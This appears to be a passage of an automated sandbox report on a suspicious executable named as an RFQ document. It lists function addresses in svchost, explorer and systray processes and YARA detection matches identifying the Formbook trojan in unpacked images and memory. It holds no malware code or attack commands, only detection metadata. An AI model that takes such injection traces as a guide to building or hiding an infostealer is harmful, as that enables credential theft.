          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030CF22_2_03030CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D2_2_030F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C2_2_0302D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0308739A2_2_0308739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A02_2_030452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C02_2_0305B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED2_2_030E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307516C2_2_0307516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F1722_2_0302F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B16B2_2_0310B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304B1B02_2_0304B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF0CC2_2_030EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C02_2_030470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F70E92_2_030F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF0E02_2_030FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF7B02_2_030FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030856302_2_03085630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F16CC2_2_030F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F75712_2_030F7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DD5B02_2_030DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031095C32_2_031095C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF43F2_2_030FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030314602_2_03031460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFB762_2_030FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FB802_2_0305FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B5BF02_2_030B5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307DBF92_2_0307DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFA492_2_030FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7A462_2_030F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B3A6C2_2_030B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DDAAC2_2_030DDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03085AA02_2_03085AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E1AA32_2_030E1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EDAC62_2_030EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D59102_2_030D5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030499502_2_03049950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B9502_2_0305B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD8002_2_030AD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030438E02_2_030438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFF092_2_030FFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041F922_2_03041F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFFB12_2_030FFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003FD22_2_03003FD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003FD52_2_03003FD5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03049EB02_2_03049EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043D402_2_03043D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F1D5A2_2_030F1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7D732_2_030F7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FDC02_2_0305FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B9C322_2_030B9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFCF22_2_030FFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F1A0362_2_02F1A036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F1B2322_2_02F1B232
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F110822_2_02F11082
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F1E5CD2_2_02F1E5CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F15B302_2_02F15B30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F15B322_2_02F15B32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F189122_2_02F18912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F12D022_2_02F12D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1F5B323_2_0B1F5B32
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1F5B303_2_0B1F5B30
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1FB2323_2_0B1FB232
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1F89123_2_0B1F8912
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1F2D023_2_0B1F2D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1FE5CD3_2_0B1FE5CD
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1FA0363_2_0B1FA036
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1F10823_2_0B1F1082
          Source: C:\Windows\explorer.exeCode function: 3_2_10D1C2323_2_10D1C232
          Source: C:\Windows\explorer.exeCode function: 3_2_10D120823_2_10D12082
          Source: C:\Windows\explorer.exeCode function: 3_2_10D1B0363_2_10D1B036
          Source: C:\Windows\explorer.exeCode function: 3_2_10D1F5CD3_2_10D1F5CD
          Source: C:\Windows\explorer.exeCode function: 3_2_10D199123_2_10D19912
          Source: C:\Windows\explorer.exeCode function: 3_2_10D13D023_2_10D13D02
          Source: C:\Windows\explorer.exeCode function: 3_2_10D16B303_2_10D16B30
          Source: C:\Windows\explorer.exeCode function: 3_2_10D16B323_2_10D16B32
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DFE4F64_2_04DFE4F6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E024464_2_04E02446
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DF44204_2_04DF4420
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E105914_2_04E10591
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D505354_2_04D50535
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D6C6E04_2_04D6C6E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D4C7C04_2_04D4C7C0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D747504_2_04D74750
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D507704_2_04D50770
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DE20004_2_04DE2000
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E081CC4_2_04E081CC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E041A24_2_04E041A2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E101AA4_2_04E101AA
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DD81584_2_04DD8158
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DEA1184_2_04DEA118
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D401004_2_04D40100
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DD02C04_2_04DD02C0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DF02744_2_04DF0274
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E103E64_2_04E103E6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D5E3F04_2_04D5E3F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E0A3524_2_04E0A352
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D40CF24_2_04D40CF2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DF0CB54_2_04DF0CB5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D50C004_2_04D50C00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D4ADE04_2_04D4ADE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D68DBF4_2_04D68DBF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DECD1F4_2_04DECD1F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D5AD004_2_04D5AD00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E0EEDB4_2_04E0EEDB
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D62E904_2_04D62E90
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E0CE934_2_04E0CE93
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D50E594_2_04D50E59
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E0EE264_2_04E0EE26
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D42FC84_2_04D42FC8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D5CFE04_2_04D5CFE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DCEFA04_2_04DCEFA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DC4F404_2_04DC4F40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D70F304_2_04D70F30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DF2F304_2_04DF2F30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D92F284_2_04D92F28
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D7E8F04_2_04D7E8F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D368B84_2_04D368B8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D528404_2_04D52840
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D5A8404_2_04D5A840
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E1A9A64_2_04E1A9A6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D529A04_2_04D529A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D669624_2_04D66962
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D4EA804_2_04D4EA80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E06BD74_2_04E06BD7
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E0AB404_2_04E0AB40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D414604_2_04D41460
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E0F43F4_2_04E0F43F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E195C34_2_04E195C3
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DED5B04_2_04DED5B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E075714_2_04E07571
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E016CC4_2_04E016CC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D956304_2_04D95630
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E0F7B04_2_04E0F7B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E0F0E04_2_04E0F0E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E070E94_2_04E070E9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DFF0CC4_2_04DFF0CC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D570C04_2_04D570C0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D5B1B04_2_04D5B1B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E1B16B4_2_04E1B16B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D3F1724_2_04D3F172
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D8516C4_2_04D8516C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D6B2C04_2_04D6B2C0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DF12ED4_2_04DF12ED
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D552A04_2_04D552A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D9739A4_2_04D9739A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D3D34C4_2_04D3D34C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E0132D4_2_04E0132D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E0FCF24_2_04E0FCF2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DC9C324_2_04DC9C32
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D6FDC04_2_04D6FDC0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E07D734_2_04E07D73
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D53D404_2_04D53D40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E01D5A4_2_04E01D5A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D59EB04_2_04D59EB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D13FD24_2_04D13FD2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D13FD54_2_04D13FD5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D51F924_2_04D51F92
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E0FFB14_2_04E0FFB1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E0FF094_2_04E0FF09
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D538E04_2_04D538E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DBD8004_2_04DBD800
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D599504_2_04D59950
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D6B9504_2_04D6B950
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DE59104_2_04DE5910
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DFDAC64_2_04DFDAC6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DEDAAC4_2_04DEDAAC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D95AA04_2_04D95AA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DF1AA34_2_04DF1AA3
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E07A464_2_04E07A46
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E0FA494_2_04E0FA49
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DC3A6C4_2_04DC3A6C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D8DBF94_2_04D8DBF9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DC5BF04_2_04DC5BF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D6FB804_2_04D6FB80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E0FB764_2_04E0FB76
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6E28D4_2_02E6E28D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6D7704_2_02E6D770
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6E57F4_2_02E6E57F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6DB1D4_2_02E6DB1D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E59E4B4_2_02E59E4B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E59E504_2_02E59E50
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E52FB04_2_02E52FB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6DC794_2_02E6DC79
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6DDB74_2_02E6DDB7
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E52D884_2_02E52D88
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E52D904_2_02E52D90
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04C0A0364_2_04C0A036
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04C0E5CD4_2_04C0E5CD
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04C02D024_2_04C02D02
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04C010824_2_04C01082
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04C089124_2_04C08912
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04C0B2324_2_04C0B232
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04C05B304_2_04C05B30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04C05B324_2_04C05B32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 280 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 110 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04DCF290 appears 105 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04D85130 appears 58 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04D97E54 appears 110 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04D3B970 appears 280 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04DBEA12 appears 86 times
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: String function: 00108B40 appears 42 times
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: String function: 00100D27 appears 70 times
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: String function: 000E7F41 appears 35 times
          Source: MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1427452536.00000000038E3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MKCC-MEC-RFQ-115-2024.exe
          Source: MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1426625082.0000000003A5D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MKCC-MEC-RFQ-115-2024.exe
          Source: MKCC-MEC-RFQ-115-2024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
